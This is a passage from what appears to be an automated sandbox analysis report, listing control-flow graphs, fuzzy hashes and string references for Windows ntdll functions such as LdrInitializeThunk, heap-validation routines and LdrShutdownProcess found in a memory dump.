21702 3591b7db GetPEB 21701->21702 21704 3591b7f7 21702->21704 21703 3591b85f 21704->21703 21705 3591b82a GetPEB 21704->21705 21706 3591b844 21705->21706 21706->21691 21344 359af760 21345 359af770 21344->21345 21346 359af782 21344->21346 21345->21346 21347 35929486 2 API calls 21345->21347 21347->21346 21707 359bd660 21710 359bd672 21707->21710 21708 359bd676 21709 359bd6bb GetPEB 21709->21710 21710->21708 21710->21709 20948 3593f06d 20949 3593f085 20948->20949 20951 3593f13f 20949->20951 20952 35941412 20949->20952 20959 3594121f 20952->20959 20954 35941547 20954->20951 20955 35941427 20955->20954 20963 359415f4 20955->20963 20957 35941525 20957->20954 20977 359415a9 20957->20977 20960 3594123f 20959->20960 20962 359412d3 20960->20962 20989 359b72a0 20960->20989 20962->20955 20964 3594161e 20963->20964 20965 3598a5bb GetPEB 20964->20965 20966 35941678 20964->20966 20975 3594165c 20964->20975 20967 3598a5ce GetPEB 20965->20967 20966->20967 20969 3594168b 20966->20969 20968 3598a5e1 20967->20968 20967->20969 20968->20969 20970 3598a5ea GetPEB 20968->20970 20971 359416c6 20969->20971 20972 3598a635 GetPEB 20969->20972 20969->20975 20970->20969 20973 3598a648 GetPEB 20971->20973 20971->20975 20972->20973 20974 3598a65b 20973->20974 20973->20975 20974->20975 20976 3598a664 GetPEB 20974->20976 20975->20957 20976->20975 20978 359415bc 20977->20978 20979 3598a499 GetPEB 20978->20979 20980 359415c9 20978->20980 20979->20980 20983 359415d9 20980->20983 20984 3598a4b5 GetPEB 20980->20984 20981 359415e6 20985 3598a4e5 GetPEB 20981->20985 20987 359415ef 20981->20987 20982 3598a4d1 GetPEB 20982->20985 20983->20981 20983->20982 20983->20987 20984->20983 20986 3598a4f8 20985->20986 20985->20987 20986->20987 20988 3598a501 GetPEB 20986->20988 20987->20954 20988->20987 20991 359b72b8 20989->20991 20990 359b72f0 GetPEB 20992 359b7302 20990->20992 20991->20990 20991->20992 20993 359b7309 GetPEB 20992->20993 20994 359b7319 20993->20994 20994->20962

                                                          Executed Functions

                                                          Function 359635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1 359635c0-359635cc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e51632cab30350cbb4cf8346960018dd439f3e22e24f671b3252c1904115022c
                                                          • Instruction ID: 8bce4fc2442dcc1b5d25b6f0e2085c6ad2b1d0fce0f452f141d8ab1bb554ee93
                                                          • Opcode Fuzzy Hash: e51632cab30350cbb4cf8346960018dd439f3e22e24f671b3252c1904115022c
                                                          • Instruction Fuzzy Hash: 27900232605A0402D1047158451870610194BD0201FA5C4A3A0424528DC7998A5565A2
                                                          Function 35962DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 35962df0-35962dfc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 84a37b5ddd9d315022bd70b943bbc3efd3f96b2693cdd9138f0fa0ac1ad97700
                                                          • Instruction ID: 4b5a8c86b0907afc9153f2205724e8fff3677d5fcdab8880de2b1a69ef9d8888
                                                          • Opcode Fuzzy Hash: 84a37b5ddd9d315022bd70b943bbc3efd3f96b2693cdd9138f0fa0ac1ad97700
                                                          • Instruction Fuzzy Hash: FE90023220190413D11571584508707001D4BD0241FD5C4A3A0424518DD65A8A56A121

                                                          Non-executed Functions

                                                          Function 359C94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2 359c94e0-359c9529 3 359c9578-359c9587 2->3 4 359c952b-359c9530 2->4 5 359c9534-359c953a 3->5 6 359c9589-359c958e 3->6 4->5 7 359c9695-359c96bd call 35969020 5->7 8 359c9540-359c9564 call 35969020 5->8 9 359c9d13-359c9d27 call 35964c30 6->9 18 359c96dc-359c9712 7->18 19 359c96bf-359c96da call 359c9d2a 7->19 16 359c9566-359c9573 call 359e972b 8->16 17 359c9593-359c9634 GetPEB call 359cdc65 8->17 30 359c967d-359c9690 RtlDebugPrintTimes 16->30 28 359c9636-359c9644 17->28 29 359c9652-359c9667 17->29 20 359c9714-359c9716 18->20 19->20 20->9 25 359c971c-359c9731 RtlDebugPrintTimes 20->25 25->9 36 359c9737-359c973e 25->36 28->29 31 359c9646-359c964b 28->31 29->30 32 359c9669-359c966e 29->32 30->9 31->29 34 359c9670 32->34 35 359c9673-359c9676 32->35 34->35 35->30 36->9 38 359c9744-359c975f 36->38 39 359c9763-359c9774 call 359ca808 38->39 42 359c977a-359c977c 39->42 43 359c9d11 39->43 42->9 44 359c9782-359c9789 42->44 43->9 45 359c98fc-359c9902 44->45 46 359c978f-359c9794 44->46 47 359c9a9c-359c9aa2 45->47 48 359c9908-359c9937 call 35969020 45->48 49 359c97bc 46->49 50 359c9796-359c979c 46->50 53 359c9af4-359c9af9 47->53 54 359c9aa4-359c9aad 47->54 64 359c9939-359c9944 48->64 65 359c9970-359c9985 48->65 51 359c97c0-359c9811 call 35969020 RtlDebugPrintTimes 49->51 50->49 55 359c979e-359c97b2 50->55 51->9 91 359c9817-359c981b 51->91 59 359c9aff-359c9b07 53->59 60 359c9ba8-359c9bb1 53->60 54->39 58 359c9ab3-359c9aef call 35969020 54->58 61 359c97b8-359c97ba 55->61 62 359c97b4-359c97b6 55->62 85 359c9ce9 58->85 68 359c9b09-359c9b0d 59->68 69 359c9b13-359c9b3d call 359c8513 59->69 60->39 66 359c9bb7-359c9bba 60->66 61->51 62->51 71 359c994f-359c996e 64->71 72 359c9946-359c994d 64->72 76 359c9987-359c9989 65->76 77 359c9991-359c9998 65->77 73 359c9c7d-359c9cb4 call 35969020 66->73 74 359c9bc0-359c9c0a 66->74 68->60 68->69 88 359c9d08-359c9d0c 69->88 89 359c9b43-359c9b9e call 35969020 RtlDebugPrintTimes 69->89 84 359c99d9-359c99f6 RtlDebugPrintTimes 71->84 72->71 100 359c9cbb-359c9cc2 73->100 101 359c9cb6 73->101 82 359c9c0c 74->82 83 359c9c11-359c9c1e 74->83 86 359c998f 76->86 87 359c998b-359c998d 76->87 79 359c99bd-359c99bf 77->79 92 359c999a-359c99a4 79->92 93 359c99c1-359c99d7 79->93 82->83 94 359c9c2a-359c9c2d 83->94 95 359c9c20-359c9c23 83->95 84->9 116 359c99fc-359c9a1f call 35969020 84->116 96 359c9ced 85->96 86->77 87->77 88->39 89->9 134 359c9ba4 89->134 102 359c981d-359c9825 91->102 103 359c986b-359c9880 91->103 97 359c99ad 92->97 98 359c99a6 92->98 93->84 106 359c9c2f-359c9c32 94->106 107 359c9c39-359c9c7b 94->107 95->94 105 359c9cf1-359c9d06 RtlDebugPrintTimes 96->105 110 359c99af-359c99b1 97->110 98->93 108 359c99a8-359c99ab 98->108 111 359c9ccd 100->111 112 359c9cc4-359c9ccb 100->112 101->100 113 359c9827-359c9850 call 359c8513 102->113 114 359c9852-359c9869 102->114 115 359c9886-359c9894 103->115 105->9 105->88 106->107 107->105 108->110 118 359c99bb 110->118 119 359c99b3-359c99b5 110->119 120 359c9cd1-359c9cd7 111->120 112->120 122 359c9898-359c98ef call 35969020 RtlDebugPrintTimes 113->122 114->115 115->122 132 359c9a3d-359c9a58 116->132 133 359c9a21-359c9a3b 116->133 118->79 119->118 127 359c99b7-359c99b9 119->127 128 359c9cde-359c9ce4 120->128 129 359c9cd9-359c9cdc 120->129 122->9 138 359c98f5-359c98f7 122->138 127->79 128->96 135 359c9ce6 128->135 129->85 136 359c9a5d-359c9a8b RtlDebugPrintTimes 132->136 133->136 134->60 135->85 136->9 140 359c9a91-359c9a97 136->140 138->88 140->66
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $ $0
                                                          • API String ID: 3446177414-3352262554
                                                          • Opcode ID: 9c3b12ebbf37b7f7537061ff775418f3cdba84e88978f404e45a49c1bdea1c22
                                                          • Instruction ID: 2a17cafe817463cabb465590ccb5af3460cc349710e105473758d8d712fab87a
                                                          • Opcode Fuzzy Hash: 9c3b12ebbf37b7f7537061ff775418f3cdba84e88978f404e45a49c1bdea1c22
                                                          • Instruction Fuzzy Hash: BA3203B16083818FE350CF68C984B5BFBF9BB88344F04496DF59987290DBB5E949CB52
                                                          Function 359CF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 384 359cf525-359cf547 call 35977e54 387 359cf549-359cf55e RtlDebugPrintTimes 384->387 388 359cf563-359cf57b call 359176b2 384->388 392 359cf867-359cf876 387->392 393 359cf581-359cf59c 388->393 394 359cf852 388->394 395 359cf59e 393->395 396 359cf5a5-359cf5b7 393->396 397 359cf855-359cf864 call 359cf879 394->397 395->396 398 359cf5bc-359cf5c4 396->398 399 359cf5b9-359cf5bb 396->399 397->392 402 359cf5ca-359cf5cd 398->402 403 359cf7d0-359cf7d9 GetPEB 398->403 399->398 402->403 406 359cf5d3-359cf5d6 402->406 404 359cf7f8-359cf7fd call 3591b970 403->404 405 359cf7db-359cf7f6 GetPEB call 3591b970 403->405 412 359cf802-359cf816 call 3591b970 404->412 405->412 409 359cf5d8-359cf5f0 call 3592ffb0 406->409 410 359cf5f3-359cf616 call 359d0cb5 call 35935e70 call 359d11a4 406->410 409->410 410->397 423 359cf61c-359cf623 410->423 412->394 424 359cf62e-359cf636 423->424 425 359cf625-359cf62c 423->425 426 359cf638-359cf648 424->426 427 359cf654-359cf658 424->427 425->424 426->427 428 359cf64a-359cf64f call 359ddac6 426->428 429 359cf688-359cf68e 427->429 430 359cf65a-359cf66d call 35953bc9 427->430 428->427 431 359cf691-359cf69b 429->431 439 359cf67f 430->439 440 359cf66f-359cf67d call 3594fe99 430->440 434 359cf69d-359cf6ad 431->434 435 359cf6af-359cf6b6 431->435 434->435 437 359cf6b8-359cf6bc call 359d0cb5 435->437 438 359cf6c1-359cf6d0 GetPEB 435->438 437->438 443 359cf73e-359cf749 438->443 444 359cf6d2-359cf6d5 438->444 441 359cf682-359cf686 439->441 440->441 441->431 443->397 447 359cf74f-359cf755 443->447 448 359cf6f4-359cf6f9 call 3591b970 444->448 449 359cf6d7-359cf6f2 GetPEB call 3591b970 444->449 447->397 450 359cf75b-359cf762 447->450 453 359cf6fe-359cf712 call 3591b970 448->453 449->453 450->397 454 359cf768-359cf773 450->454 461 359cf715-359cf71f GetPEB 453->461 454->397 457 359cf779-359cf782 GetPEB 454->457 459 359cf784-359cf79f GetPEB call 3591b970 457->459 460 359cf7a1-359cf7a6 call 3591b970 457->460 466 359cf7ab-359cf7cb call 359c86ba call 3591b970 459->466 460->466 461->397 464 359cf725-359cf739 461->464 464->397 466->461
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                          • API String ID: 3446177414-1745908468
                                                          • Opcode ID: 30dd031d339394eacdcb3631f5a2885e476e55b0f0b61301299ced5316bee335
                                                          • Instruction ID: 8f3c3a13d1b1f64e38a894f5371523700162300cfd28bd0a0c0d3bce63b34da0
                                                          • Opcode Fuzzy Hash: 30dd031d339394eacdcb3631f5a2885e476e55b0f0b61301299ced5316bee335
                                                          • Instruction Fuzzy Hash: 14910475A04749DFDB11CFA8C440AADBBF2FF49314F158099E446AB262CB35AA81CF11
                                                          Function 359D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                          • API String ID: 0-3591852110
                                                          • Opcode ID: 369c9827d565165374bf56be9583b30626a82f3da26351e35e3fecda27313fa7
                                                          • Instruction ID: 76faa5a7347f9d3a0ca2c1b43853c35a494e6b6827f9284185007d5074815bf1
                                                          • Opcode Fuzzy Hash: 369c9827d565165374bf56be9583b30626a82f3da26351e35e3fecda27313fa7
                                                          • Instruction Fuzzy Hash: 9812AA7A604686DFE725CF24C440BAAFBF6FF09344F44C459E8868B652D738E981EB50
                                                          Function 3591D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 822 3591d34c-3591d38d 823 3591d393-3591d395 822->823 824 3597a90d 822->824 823->824 825 3591d39b-3591d39e 823->825 827 3597a917-3597a930 call 359dc188 824->827 825->824 826 3591d3a4-3591d3ac 825->826 828 3591d3b6-3591d401 call 35965130 call 35962b90 826->828 829 3591d3ae-3591d3b0 826->829 834 3597a936-3597a939 827->834 835 3591d5ca-3591d5cd 827->835 847 3597a871-3597a88b call 35917270 828->847 848 3591d407-3591d410 828->848 829->828 831 3597a867-3597a86c 829->831 837 3591d620-3591d628 831->837 839 3591d5ad-3591d5af 834->839 838 3591d5cf-3591d5d5 835->838 842 3591d69b-3591d69d 838->842 843 3591d5db-3591d5e8 GetPEB call 35933ca0 838->843 839->835 841 3591d5b1-3591d5c4 call 35943342 839->841 841->835 857 3597a93e-3597a943 841->857 849 3591d5ed-3591d5f2 842->849 843->849 863 3597a895-3597a899 847->863 864 3597a88d-3597a88f 847->864 853 3591d412-3591d414 848->853 854 3591d41a-3591d42d call 3591d796 848->854 851 3591d601-3591d606 849->851 852 3591d5f4-3591d5fd call 35962b60 849->852 860 3591d615-3591d61a 851->860 861 3591d608-3591d611 call 35962b60 851->861 852->851 853->854 859 3597a8a1-3597a8ac call 359db1e1 853->859 871 3591d433-3591d437 854->871 872 3597a8c9 854->872 857->835 859->854 878 3597a8b2-3597a8c4 859->878 860->837 865 3597a948-3597a94c call 35962b60 860->865 861->860 863->859 864->863 873 3591d58e 864->873 879 3597a951 865->879 876 3591d62b-3591d683 call 35965130 call 35962b90 871->876 877 3591d43d-3591d457 call 3591d930 871->877 883 3597a8d1-3597a8d3 872->883 880 3591d590-3591d595 873->880 896 3591d6a2-3591d6a5 876->896 897 3591d685 876->897 877->883 890 3591d45d-3591d4ae call 35965130 call 35962b90 877->890 878->854 879->879 884 3591d597-3591d599 880->884 885 3591d5a9 880->885 883->835 888 3597a8d9 883->888 884->827 889 3591d59f-3591d5a3 884->889 885->839 894 3597a8de 888->894 889->827 889->885 890->872 902 3591d4b4-3591d4bd 890->902 899 3597a8e8-3597a8ed 894->899 896->873 901 3591d68f-3591d696 897->901 899->842 901->880 902->894 903 3591d4c3-3591d4f2 call 35965130 call 3591d6aa 902->903 903->901 908 3591d4f8-3591d4fe 903->908 908->901 909 3591d504-3591d50a 908->909 909->842 910 3591d510-3591d52c GetPEB call 35935e70 909->910 910->899 913 3591d532-3591d54f call 3591d6aa 910->913 916 3591d551-3591d556 913->916 917 3591d586-3591d58c 913->917 918 3597a8f2-3597a8f7 916->918 919 3591d55c-3591d584 call 35944d86 916->919 917->838 917->873 918->919 920 3597a8fd-3597a908 918->920 919->917 920->880
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          • Opcode ID: 8f1fc0f0ff051b5e343e2141d53e6c1ef45e803f5aaa3d1589e5d5a19cb644ae
                                                          • Instruction ID: b3a1ba5259f0111220ced1bc4f22d922a6870bc9592f2be84d25f37b17e9bfb5
                                                          • Opcode Fuzzy Hash: 8f1fc0f0ff051b5e343e2141d53e6c1ef45e803f5aaa3d1589e5d5a19cb644ae
                                                          • Instruction Fuzzy Hash: 4DB19AB25083699FD711CF24C480A5BB7E8BF88794F42492EFC89D7250D774EA08CB92
                                                          Function 35931070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 3446177414-3570731704
                                                          • Opcode ID: af46afa72ce77037ac3e77eef6c29a7852bc43447f95c8287c4669f2ddb842ad
                                                          • Instruction ID: ff055bff5987df6fa7da5bbb663d2ce89fe856463b59e03212384dce0cfca0c1
                                                          • Opcode Fuzzy Hash: af46afa72ce77037ac3e77eef6c29a7852bc43447f95c8287c4669f2ddb842ad
                                                          • Instruction Fuzzy Hash: 7B927975A05368CFEB20CF18C881F99B7BABF48350F0581EAD849AB251DB749E84CF51
                                                          Function 3594D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1299 3594d7b0-3594d7cd call 35977e54 1302 3594d8f0-3594d8ff 1299->1302 1303 3594d7d3-3594d7e9 1299->1303 1304 3594d7ef-3594d7f6 1303->1304 1305 3598f2b6-3598f2b8 1303->1305 1306 3598f2c0-3598f2e2 call 3599ea12 1304->1306 1307 3594d7fc-3594d812 1304->1307 1305->1306 1314 3598f2ea-3598f303 1306->1314 1309 3594d93d-3594d961 RtlDebugPrintTimes 1307->1309 1310 3594d818-3594d820 1307->1310 1309->1305 1312 3594d822-3594d824 call 35924859 1310->1312 1313 3594d829-3594d830 1310->1313 1312->1313 1313->1314 1315 3594d836-3594d845 1313->1315 1314->1315 1319 3598f309-3598f30f 1314->1319 1318 3594d846-3594d84c 1315->1318 1320 3594d8c1-3594d8cb 1318->1320 1321 3594d84e-3594d862 1318->1321 1322 3594d8cd-3594d8da GetPEB 1319->1322 1320->1322 1323 3594d900-3594d93b call 3593dd20 call 3593f183 call 3594d96f 1320->1323 1321->1318 1326 3594d864-3594d86b 1321->1326 1324 3594d8e0-3594d8e4 1322->1324 1325 3598f332-3598f335 1322->1325 1323->1322 1327 3594d8e6 call 3594d9d0 1324->1327 1328 3594d8eb call 3594d978 1324->1328 1325->1324 1331 3598f33b-3598f346 call 359a1348 1325->1331 1326->1318 1329 3594d86d-3594d896 call 3593dd20 1326->1329 1327->1328 1328->1302 1340 3594d8b6-3594d8bf call 3593f183 1329->1340 1341 3594d898-3594d8b4 call 3593ddb1 call 3594d966 1329->1341 1331->1324 1340->1341 1341->1318
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3594D959
                                                            • Part of subcall function 35924859: RtlDebugPrintTimes.NTDLL ref: 359248F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1975516107
                                                          • Opcode ID: 59a29d0c0acf179b3b0aff1fe991f2605e0ac450a829d00537bedbbeea679ca0
                                                          • Instruction ID: 220ef037ff0992403672dfbd83d8394b895dac9b30cba7ac76ba405387af60af
                                                          • Opcode Fuzzy Hash: 59a29d0c0acf179b3b0aff1fe991f2605e0ac450a829d00537bedbbeea679ca0
                                                          • Instruction Fuzzy Hash: E651DFB9A04345DFDB10CFA8D580B9DBBB2BF48354F164159D801AB381DB78AD86DF90
                                                          Function 359B9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1351 359b9179-359b91ed call 35969020 * 2 1356 359b91f3-359b91f9 1351->1356 1357 359b9686 1351->1357 1356->1357 1358 359b91ff-359b924a 1356->1358 1359 359b968b-359b969f call 35964c30 1357->1359 1360 359b9372-359b938a call 35962ca0 1358->1360 1361 359b9250-359b9252 1358->1361 1368 359b9390-359b9394 1360->1368 1369 359b9644-359b9650 call 35933c70 1360->1369 1364 359b9256-359b9271 call 35962ca0 1361->1364 1364->1369 1372 359b9277-359b927c 1364->1372 1368->1364 1371 359b939a-359b93b8 call 35962ca0 1368->1371 1378 359b9658-359b965d 1369->1378 1379 359b9652-359b9653 call 35933c70 1369->1379 1371->1369 1387 359b93be-359b93c7 1371->1387 1375 359b92b9-359b92d4 call 35962ca0 1372->1375 1376 359b927e-359b9299 call 35962ca0 1372->1376 1375->1369 1389 359b92da-359b92df 1375->1389 1376->1369 1394 359b929f-359b92b3 call 35943aa0 1376->1394 1385 359b9669-359b966f 1378->1385 1386 359b965f-359b9664 call 35933c70 1378->1386 1379->1378 1391 359b9682-359b9684 1385->1391 1392 359b9671-359b967d GetPEB call 35933ca0 1385->1392 1386->1385 1387->1364 1393 359b93cd-359b93d2 1387->1393 1395 359b9318 1389->1395 1396 359b92e1-359b92f0 call 359b6920 1389->1396 1391->1359 1392->1391 1393->1369 1394->1369 1394->1375 1400 359b931d-359b933e call 35962ca0 1395->1400 1396->1369 1404 359b92f6-359b92fb 1396->1404 1400->1369 1408 359b9344-359b934d 1400->1408 1406 359b9301-359b9312 call 35943aa0 1404->1406 1407 359b93d7-359b93e6 call 359b6870 1404->1407 1406->1369 1406->1395 1407->1369 1417 359b93ec-359b9400 call 35943aa0 1407->1417 1409 359b9353-359b9355 1408->1409 1410 359b9461 1408->1410 1409->1410 1414 359b935b-359b9364 call 35933d20 1409->1414 1416 359b9463-359b9468 1410->1416 1414->1410 1430 359b936a-359b936d 1414->1430 1419 359b946a-359b946c 1416->1419 1420 359b94a5-359b94a9 1416->1420 1417->1369 1435 359b9406-359b9435 call 359b7bbf 1417->1435 1425 359b949e-359b94a3 1419->1425 1426 359b946e-359b9475 1419->1426 1423 359b94ab-359b94b2 1420->1423 1424 359b94d6 1420->1424 1432 359b94b9-359b94d4 call 359b7bbf 1423->1432 1433 359b94b4 1423->1433 1431 359b94db-359b94e4 call 359b7b8a 1424->1431 1425->1431 1427 359b947c-359b949c call 359b7bbf 1426->1427 1428 359b9477 1426->1428 1441 359b94e9-359b94ed 1427->1441 1428->1427 1430->1416 1431->1441 1432->1441 1433->1432 1435->1369 1445 359b943b-359b945c call 35933c70 call 35965130 1435->1445 1441->1369 1443 359b94f3-359b9512 call 359b7b4a 1441->1443 1443->1369 1448 359b9518-359b951d 1443->1448 1445->1400 1450 359b951f-359b9524 1448->1450 1451 359b9534 1448->1451 1450->1451 1453 359b9526-359b9532 1450->1453 1454 359b9538-359b953d 1451->1454 1453->1454 1456 359b9549-359b9551 1454->1456 1457 359b953f-359b9547 1454->1457 1458 359b9553-359b9558 1456->1458 1459 359b9575-359b9582 call 35935e40 1456->1459 1457->1456 1458->1459 1460 359b955a-359b9573 call 35965130 1458->1460 1464 359b958e-359b95b6 call 35969020 call 3592ff20 1459->1464 1465 359b9584-359b9589 1459->1465 1460->1459 1464->1369 1471 359b95bc-359b95c1 1464->1471 1465->1369 1472 359b95ec-359b95f1 1471->1472 1473 359b95c3-359b95c8 1471->1473 1475 359b95f3-359b9602 call 359411b0 1472->1475 1476 359b9615-359b961d 1472->1476 1473->1472 1474 359b95ca-359b95d9 call 359411b0 1473->1474 1474->1369 1485 359b95db-359b95ea call 359411b0 1474->1485 1475->1369 1483 359b9604-359b9613 call 359411b0 1475->1483 1476->1369 1478 359b961f-359b9624 1476->1478 1478->1369 1481 359b9626-359b9635 call 359411b0 1478->1481 1481->1369 1490 359b9637-359b9642 call 359411b0 1481->1490 1483->1369 1483->1476 1485->1369 1485->1472 1490->1369
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
